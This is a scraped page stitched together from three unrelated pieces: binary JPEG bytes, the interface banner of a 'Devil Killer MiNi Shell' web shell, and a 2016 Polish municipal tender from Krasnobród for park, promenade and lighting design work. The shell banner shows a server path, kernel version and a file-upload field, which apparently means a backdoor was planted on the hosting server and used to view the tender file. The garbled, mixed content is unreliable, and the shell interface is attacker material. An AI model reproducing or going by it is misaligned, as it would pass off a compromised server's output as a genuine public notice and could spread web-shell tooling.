JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161224/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161224/373658-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.krasnobrod.pl w zakładce przetargi ' target='_blank'>http://www.krasnobrod.pl w zakładce przetargi </a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 373658 - 2016
              z dnia 2016-12-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Krasnobród: Opracowanie dokumentacji projektowej budowlano - wykonawczej oraz kosztorysowej  dla potrzeb realizacji projektu - Zachowanie i udostępnienie najatrakcyjniejszych elementów dziedzictwa naturalnego w Krasnobrodzie.   <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Zachowanie i udostępnienie najatrakcyjniejszych elementów dziedzictwa naturalnego w Krasnobrodzie. Program operacyjny RPO WL 2014-2020. Oś 7 Ochrona dziedzicwa kulturowego i naturalnego. działanie 7.1 Dziedzictwo kulturowe i naturalne</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Krasnobród, krajowy numer identyfikacyjny
              95036870100000, ul.
              ul. 3 Maja 
              36,
              22440  
              Krasnobród, woj.
              lubelskie, państwo
              Polska, tel.
              0-84 660 7691, e-mail
              um@krasnobrod.pl, faks
              0-84 660 7692.
              <br />
              Adres strony internetowej (URL): www.krasnobrod.pl <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.krasnobrod.pl </div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.krasnobrod.pl w zakładce przetargi </div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty w formie pisemnej nalezy złożyć w siedzibie zamawiającego - Urząd Miejski w Krasnobrodzie - Sekretariat Urzędu <br />
                Adres:
                <br />ul. 3 Maja 36; 22-440 Krasnobród   </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Opracowanie dokumentacji projektowej budowlano - wykonawczej oraz kosztorysowej  dla potrzeb realizacji projektu - Zachowanie i udostępnienie najatrakcyjniejszych elementów dziedzictwa naturalnego w Krasnobrodzie.   <br /><b>Numer referencyjny: </b>I 271.20.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Część zamówienia nr 1  
Zachowanie i udostępnienie najatrakcyjniejszych elementów dziedzictwa naturalnego w Krasnobrodzie - Opracowanie projektu  budowlano-wykonawczego promenady spacerowej w  ul. Młyńskiej. 
Projekt promenady spacerowej o szerokości 5m od projektowanego skrzyżowania drogi powiatowej nr 3260L ciągu drogowego Krasnobród  Jacnia do rzeki Wieprz ( W zakres opracowania nie wchodzi zaprojektowanie utwardzenia nawierzchni na jazie). Nawierzchnię promenady należy projektować  jako utwardzoną, okrawężnikowaną. Rodzaj nawierzchni kostka brukowa gr. 8cm  wzoru starobruk lub  stare miasto lub bruk staromiejski. Szerokość jezdni na całym projektowanym odcinku ma wynosić nie mniej jak 5m. Długość projektowanego odcinka około 800m.
Wzdłuż projektowanego odcinka promenady spacerowej należy zaprojektować lokalne utwardzenia z kostki brukowej pod ustawienie ławek parkowych. Ilość  ławek jaka będzie zaprojektowana przy promenadzie wynosi nie mniej niż 10 sztuk.  W miejscach gdzie niezbędne będzie umocnienie skarp należy zastosować umocnienia (ubezpieczenia) płytami ażurowymi typu MEBA.   
Projektowanie promenady winno uwzględniać  w sposób maksymalny zachowanie istniejącego drzewostanu wzdłuż promenady. Do wycinki należy przewidzieć  tylko drzewostan oceniony przez dendrologa jako znajdujący się w złej kondycji lub zagrażający bezpieczeństwu pieszych.   

Wraz z projektem budowlano-wykonawczym promenady wykonawca opracuje  projekt organizacji ruchu. Na całym odcinku promenady ma obowiązywać  zakaz ruchu  w obu kierunkach. Projektant może zaprojektować na promenadzie progi zwalniające wykonane z kostki brukowej (progi zwalniające wg instrukcji o sygnałach i znakach drogowych) jeśli organ zarządzający ruchem na drogach zaleci w trakcie uzgadniania projektu  organizacji ruchu zaprojektowanie progów zwalniających.  
Przedmiot zamówienia określony jako część zamówienia nr 1 wykonawca przekaże Zamawiającemu w następujących ilościach:
1. Projekty budowlane - 5 egzemplarzy.
(Projekt budowlany wraz z niezbędnymi uzgodnieniami ma umożliwiać uzyskanie pozwolenie na budowę, o którym mowa w ustawie Prawo budowlane oraz  spełniać wymagania Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012r. poz. 462).
2. Projekty wykonawcze - 5 egzemplarzy. 
(Projekty wykonawcze muszą uwzględniać wymagania określone w § 5 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jednolity Dz. U. z dnia 24 września 2013r. poz. 1129).

3. Kosztorysy inwestorskie - 2 egzemplarze
Kosztorysy inwestorskie będą sporządzone w oparciu o przepisy zawarte w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym  Dz. U. z 2004, Nr 130 poz.1389.
4. Kosztorysy ofertowe - 1 egzemplarz.
5. Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych - 1 egzemplarz.
Specyfikacje muszą uwzględniać wymagania określone w § 13 i 14 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jednolity Dz. U. z dnia 24 września 2013r. poz. 1129).
6.  Wersje cyfrowe dokumentacji - 2 płyty CD zawierające: 
- Projekt budowlany i projekt wykonawczy skanowany do PDF lub zapisany w formacie PDF). 
- Kosztorys inwestorski w wersji PDF.
- Kosztorysy ofertowe w wersji PDF.
- SSTWiORB w wersji WORD lub PDF.
 
7. Projekt czasowej organizacji ruchu na czas budowy oraz projekt stałej organizacji ruchu   2 egzemplarze. 
Projektant opracowujący projekty budowlano-wykonawcze  zobowiązany jest do:
-  uzgodnienia projektów budowlano-wykonawczych z Dyrekcją Krasnobrodzkiego Parku Krajobrazowego.
- uzgodnienia przyjętych rozwiązań projektowych z Wojewódzkim Urzędem Ochrony Zabytków w Lublinie Delegatura w Zamościu. 

Wszystkie projekty Wykonawca opracuje na mapie do celów projektowych którą uzyska własnym staraniem.  

Przy opisywaniu rozwiązań projektowych Wykonawca nie będzie wskazywał znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia lub gdy nie może opisać urządzenia lub materiału za pomocą dostatecznie dokładnych określeń. W przypadku takiego wskazania jak powyżej, we wszystkich dokumentach wchodzących w skład przedmiotu zamówienia, należy zawrzeć określenie lub równoważny, co w konsekwencji powoduje, że wymieniony konkretny produkt otrzymuje charakter jedynie przykładowy. W przypadku zastosowania rozwiązań równoważnych Wykonawca zobowiązany jest podać parametry równoważności.

Część zamówienia nr 2 
Zachowanie i udostępnienie najatrakcyjniejszych elementów dziedzictwa naturalnego w Krasnobrodzie   Opracowanie projektów  budowlano-wykonawczych rewitalizacji zabytkowego zespołu pałacowo-parkowego w Krasnobrodzie:  Projekt  budowy ścieżek spacerowych wraz z projektem budowy tarasu wypoczynkowego,  schodów terenowych i pochylni do wejścia na taras,  elementów małej architektury, bramy wejściowej do parku od ulicy Młyńskiej oraz tablicy informacyjnej (witacza) przy granicy północnej zespołu pałacowego.  Projekt nasadzenia zieleni (drzew, krzewów i kwiatów), w tym sadu i ogrodu sensorycznego.    

Łączna powierzchnia obszaru objętego opracowaniem wynosi około 38000m2.
Ścieżki spacerowe do przebudowy będą projektowane z kostki brukowej klinkierowej. Istniejąca alejka do punktu widokowego będzie przewidziana do przebudowy z użyciem istniejącej cegły klinkierowej z której jest obecnie wykonana. Przebudowa alejki w zakresie przełożenia klinkieru jest projektowana na odcinku  o długości 130m. Łączna powierzchnia kostki klinkierowej do przełożenia wyniesie około 312m2.
Ścieżki spacerowe nowoprojektowane należy zaprojektować  z kostki betonowej imitującej  klinkier, ułożonej na podbudowie, na odcinku o długości około 470m. Szerokość ścieżek nie mniejsza niż 2m. Powierzchnia ścieżek z kostki klinkierowej wynosi około 720m2. Nawierzchnia w formie naturalnego kamienia, nieregularnie ułożonego, przerośniętego trawą, bez dodatkowej stabilizacji. Projektuje się ścieżki spacerowe z kamienia naturalnego na łącznej powierzchni około 100m2.
Budowa elementów małej architektury 

Na terenie zespołu pałacowo-parkowego należy zaprojektować:

- Ławki, drewniane na konstrukcji żeliwnej, modele katalogowe z oparciem, bez fundamentów w ilości 15 szt. ławek.
- Kosze na śmieci, drewniano żeliwne, modele katalogowe, bez fundamentów. ustawionych w ilości 10 szt. ławek.
- Tablicę informacyjną w formie "witacza" w ilości 1 szt. Tablica ma być zaprojektowana jako drewniana na fundamencie betonowym.
- Drogowskazy w ilości 2 sz. . Drogowskazy maja zostać zaprojektowane jako drewniane, mocowane na fundamentach betonowych.

Budowa  tarasu widokowego
Projekt  tarasu dwupoziomowego o wymiarach około 27mX5m każdy z poziomów, zlokalizowany na terenie działki o numerze 1228. Dwie platformy tarasu zaprojektowane w formie dwóch platform na dwóch poziomach połączonych schodami. Podłoga tarasu projektowana z desek kompozytowych na konstrukcji stalowej zabezpieczonej antykorozyjnie posadowionej na fundamentach betonowych. Taras zabezpieczony barierkami. Podłoga tarasu projektowana z desek kompozytowych.  Przy tarasie należy zaprojektować pomieszczenie gospodarcze na meble ogrodowe.  

Budowa bramy wejściowej na teren parku 

Projekt bramy o konstrukcji  drewnianej z zadaszeniem z drewna impregnowanego. Konstrukcja bramy mocowana na fundamencie betonowym.
Pokrycie dachu czterospadowego bramy projektowane z blachy płaskiej na rąbek stojący lub gont drewniany. Szerokość projektowanej bramy około 3 m,  wysokość bramy około 4m. Słupy bramy z ażurową drewnianą kratką pod pnącza.
Projekt tablicy informacyjnej w formie witacza. Tablica ma być dodatkowo podświetlona z wykorzystaniem energii odnawialnej. Tablica o konstrukcji drewnianej w kształcie zadaszonej tablicy. Pokrycie dachu czterospadowego projektowane z blachy płaskiej na rąbek stojący lub gont drewniany. Tablica wysoka. najniższe elementy poziome na wysokości powyżej 150cm. 
Drogowskazy
Projekt drogowskazów w ilości 2 szt. wykonanych z drewna. Drogowskazy mocowane na fundamentach betonowych.


Projekt nasadzenia zieleni (drzew, krzewów i kwiatów), w tym sadu i ogrodu sensorycznego.    

Na terenie sanatorium należy zaprojektować  nowe nasadzenia, w postaci nasadzeń uzupełniających a także nasadzeń nawiązujących do pierwotnie istniejących tu sadów. Wprowadzone zostaną wzdłuż drogi jako zieleń izolacyjna wysoka oraz wzdłuż ścieżek w miejscach gdzie został usunięty starodrzew. przy trasie widokowym posadzone zostaną drzewa sadownicze oraz ozdobne, natomiast wzdłuż ścieżki prowadzącej do projektowanej bramy projektowany jest ogród sensoryczny. Od bramy w ul. Młyńskiej do tarasu projektuje się ścieżkę przyrodniczo-edukacyjną. Proponowane gatunki zieleni wysokiej: lipy, platany, klony, tulipanowce, morwy.  Powierzchnia biologicznie czynna wynosi 3436m2.  
Punkt wypoczynkowy przy promenadzie spacerowej łączącej kładki nad nowym i starym korytem rzeki wieprz.
Projektowane wysokie drzewa oraz krzewy. Projektowane ławki parkowe w ilości 6 sztuk oraz kosze na śmieci w ilości 2 szt.    
Przedmiot zamówienia określony jako część zamówienia nr 2 wykonawca przekaże Zamawiającemu w następujących ilościach:
1. Projekty budowlane - 5 egzemplarzy.
(Projekt budowlany wraz z niezbędnymi uzgodnieniami ma umożliwiać uzyskanie pozwolenie na budowę, o którym mowa w ustawie Prawo budowlane oraz  spełniać wymagania Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012r. poz. 462).
2. Projekty wykonawcze - 5 egzemplarzy. 
(Projekty wykonawcze muszą uwzględniać wymagania określone w § 5 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jednolity Dz. U. z dnia 24 września 2013r. poz. 1129).

3. Kosztorysy inwestorskie - 2 egzemplarze
Kosztorysy inwestorskie będą sporządzone w oparciu o przepisy zawarte w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym  Dz. U. z 2004, Nr 130 poz.1389.
4. Kosztorysy ofertowe - 1 egzemplarz.
5. Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych - 1 egzemplarz.
Specyfikacje muszą uwzględniać wymagania określone w § 13 i 14 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jednolity Dz. U. z dnia 24 września 2013r. poz. 1129).
6.  Wersje cyfrowe dokumentacji - 2 płyty CD zawierające: 
- Projekt budowlany i projekt wykonawczy skanowany do PDF lub zapisany w formacie PDF). 
- Kosztorys inwestorski w wersji PDF.
- Kosztorysy ofertowe w wersji PDF.
- SSTWiORB w wersji WORD lub PDF.
 
Projektant opracowujący projekty budowlano-wykonawcze  zobowiązany jest do:
-  uzgodnienia projektów budowlano-wykonawczych z Dyrekcją Krasnobrodzkiego Parku Krajobrazowego.
- uzgodnienia przyjętych rozwiązań projektowych z Wojewódzkim Urzędem Ochrony Zabytków w Lublinie Delegatura w Zamościu. 

Wszystkie projekty Wykonawca opracuje na mapie do celów projektowych którą uzyska własnym staraniem.  

Przy opisywaniu rozwiązań projektowych Wykonawca nie będzie wskazywał znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia lub gdy nie może opisać urządzenia lub materiału za pomocą dostatecznie dokładnych określeń. W przypadku takiego wskazania jak powyżej, we wszystkich dokumentach wchodzących w skład przedmiotu zamówienia, należy zawrzeć określenie lub równoważny, co w konsekwencji powoduje, że wymieniony konkretny produkt otrzymuje charakter jedynie przykładowy. W przypadku zastosowania rozwiązań równoważnych Wykonawca zobowiązany jest podać parametry równoważności.

________________________________________
część zamówienia nr 3 
Zachowanie i udostępnienie najatrakcyjniejszych elementów dziedzictwa naturalnego w Krasnobrodzie - opracowanie projektów budowlano-wykonawczych wykonania  oświetlenia parkowego promenady spacerowej  w  ulicy Młyńskiej, oświetlenie parku przy sanatorium rehabilitacyjnym w Krasnobrodzie. 
Projekt oświetlenia promenady spacerowej  przy ul. Młyńskiej.
 Długość projektowanego oświetlenia parkowego  około 800m. Oświetlenie parkowe wzdłuż ciągu pieszego. Ilość słupów oświetleniowych typu parkowego około  23 szt.
Projekt oświetlenia parku przy sanatorium rehabilitacyjnym w Krasnobrodzie.
Projektowanie  oświetlenia parkowego wysokiego i niskiego. Słupy parkowe oraz lampy oświetleniowe zasilane będą z nowoprojektowanej linii kablowej oświetlenia parkowego. Parametry techniczne oświetlenia w parku: Słupy oświetleniowe z oprawami LED wysokie około 4 szt. z oprawami LED. lampy oświetleniowe LRD niskie   około11 szt.
Projekt oświetlenia promenady spacerowej łączącej kładki nad nowym i starym korytem rzeki Wieprz w Krasnobrodzie.
Projektowanie odcinka oświetlenia parkowego wyposażonego w oprawy oświetleniowe LED wzdłuż promenady spacerowej łączącej kładki nad nowym i starym korytem rzeki Wieprz w Krasnobrodzie. Długość linii kablowych oświetlenia parkowego wyniesie około 135m. Ilość projektowanych słupów oświetleniowych typu parkowego z oprawami energooszczędnymi typu LED wyniesie około 4 sztuki.  
________________________________________

Projekt instalacji monitoringu.
Na dwóch wysokich lampach oświetleniowych w parku sanatoryjnym  przy ulicy Młyńskiej zamontowany zostanie system monitoringu zespołu pałacowego, umożliwiający bezpieczne użytkowanie terenu przez 24 godziny 7 dni w tygodniu. Kamery cyfrowe będą przekazywały zapis monitoringu na nagrywarkę która znajdowała się będzie w siedzibie Sanatorium Rehabilitacyjnego w Krasnobrodzie.
________________________________________
Przy opisywaniu rozwiązań projektowych Wykonawca nie będzie wskazywał znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia lub gdy nie może opisać urządzenia lub materiału za pomocą dostatecznie dokładnych określeń. W przypadku takiego wskazania jak powyżej, we wszystkich dokumentach wchodzących w skład przedmiotu zamówienia, należy zawrzeć określenie lub równoważny, co w konsekwencji powoduje, że wymieniony konkretny produkt otrzymuje charakter jedynie przykładowy. W przypadku zastosowania rozwiązań równoważnych Wykonawca zobowiązany jest podać parametry równoważności.

Przedmiot zamówienia określony jako część zamówienia nr 3 wykonawca przekaże Zamawiającemu w następujących ilościach:
1. Projekty budowlane - 5 egzemplarzy.
(Projekt budowlany wraz z niezbędnymi uzgodnieniami ma umożliwiać uzyskanie pozwolenie na budowę, o którym mowa w ustawie Prawo budowlane oraz  spełniać wymagania Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012r. poz. 462).
2. Projekty wykonawcze - 5 egzemplarzy. 
(Projekty wykonawcze muszą uwzględniać wymagania określone w § 5 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jednolity Dz. U. z dnia 24 września 2013r. poz. 1129).

3. Kosztorysy inwestorskie - 2 egzemplarze
Kosztorysy inwestorskie będą sporządzone w oparciu o przepisy zawarte w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym  Dz. U. z 2004, Nr 130 poz.1389.
4. Kosztorysy ofertowe - 1 egzemplarz.
5. Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych - 1 egzemplarz.
Specyfikacje muszą uwzględniać wymagania określone w § 13 i 14 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jednolity Dz. U. z dnia 24 września 2013r. poz. 1129).
6.  Wersje cyfrowe dokumentacji - 2 płyty CD zawierające: 
- Projekt budowlany i projekt wykonawczy skanowany do PDF lub zapisany w formacie PDF). 
